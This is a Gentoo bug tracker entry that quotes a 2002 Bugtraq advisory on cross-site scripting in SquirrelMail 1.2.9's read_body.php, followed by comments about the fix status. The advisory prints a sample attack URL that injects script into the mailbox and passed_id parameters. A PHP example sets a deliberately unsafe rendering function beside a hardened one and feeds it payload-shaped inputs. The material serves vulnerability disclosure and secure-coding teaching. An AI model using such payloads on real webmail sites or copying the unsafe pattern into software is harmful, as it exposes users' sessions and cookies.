Bug 11687 - net-mail/squirrelmail
Summary: net-mail/squirrelmail
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Linux
Classification: Unclassified
Component: New packages
Hardware: x86 Linux
Importance: Lowest critical
Assignee: Gentoo Security
Reported: 2002-12-06 13:26 UTC by Daniel Ahlberg (RETIRED)
Modified: 2003-02-04 19:42 UTC

Description Daniel Ahlberg (RETIRED) gentoo-dev 2002-12-06 13:26:55 UTC
SquirrelMail v1.2.9 XSS bugs

From: "euronymous" <just-a-user@yandex.ru>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org
Date: Tue, 3 Dec 2002 07:28:14 +0300 (MSK)

=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: SquirrelMail v1.2.9 XSS bugs
product: SquirrelMail v1.2.9
vendor: www.squirrelmail.org
risk: low
date: 12/3/2k2
discovered by: euronymous /F0KP /HACKRU Team
advisory url: http://f0kp.iplus.ru/bz/008.txt 
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
              
description
-----------
when reading some email you can insert scripting code..
read_body.php doesn't filter user input in the `mailbox' and
`passed_id' variables. btw, v1.2.10 was released today. i don't
know if this version contains this xss.

sample attack
-------------
http://hostname/src/read_body.php?mailbox=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&passed_id=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&
startMessage=1&show_more=0

[it must be in a single string]

a non-URL-encoded string also works fine.

shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all 
russian security guyz!! 
fuck_off: slavomira and other dirty ppl in *.kz

================
im not a lame,
not yet a hacker
================
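
The pattern the advisory describes (request parameters written into the page without filtering) next to a hardened form, as an added PHP example. It is not SquirrelMail's code or its CVS fix; the function names are hypothetical, and it assumes `passed_id` is a numeric message ID.

```php
<?php
// Added illustration, not SquirrelMail source. Function names are hypothetical.

// Vulnerable pattern: request values are copied into the HTML unchanged,
// so markup supplied in the URL becomes part of the page.
function render_message_link_unsafe(array $query): string
{
    return '<a href="read_body.php?mailbox=' . $query['mailbox']
         . '&passed_id=' . $query['passed_id'] . '">'
         . $query['mailbox'] . '</a>';
}

// Hardened pattern: validate each parameter against what it is supposed to
// be, then encode for the output context (URL component, then HTML).
function render_message_link_safe(array $query): ?string
{
    // Assumption: passed_id is a positive integer message ID.
    $id = filter_var($query['passed_id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    $mailbox = $query['mailbox'] ?? '';
    if ($id === false || !is_string($mailbox) || $mailbox === '') {
        return null; // caller should answer with an error page
    }
    $href = 'read_body.php?' . http_build_query(
        ['mailbox' => $mailbox, 'passed_id' => $id]);
    return '<a href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . '">'
         . htmlspecialchars($mailbox, ENT_QUOTES, 'UTF-8') . '</a>';
}

// Constructed inputs: a normal request and two shaped like the advisory's sample.
$requests = [
    'mailbox=INBOX&passed_id=42',
    'mailbox=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&passed_id=42',
    'mailbox=INBOX&passed_id=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E',
];
foreach ($requests as $raw) {
    parse_str($raw, $query);   // decodes the query string like PHP does for $_GET
    $safe = render_message_link_safe($query);
    echo ($safe ?? '[rejected]'), "\n";
}
```
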
Comment 1 Thomas Raschbacher gentoo-dev 2002-12-06 14:31:45 UTC
hi!
it's not in 1.2.10 yet (bug announced at 6.12 release at 2.12) [seen on
squirrelmail.org]

greetings, LordVAn
Comment 2 Daniel Ahlberg (RETIRED) gentoo-dev 2002-12-15 07:53:47 UTC
The news page says the fix was committed to CVS, but no new version was made 
after the 1.2.10 release to include the bug.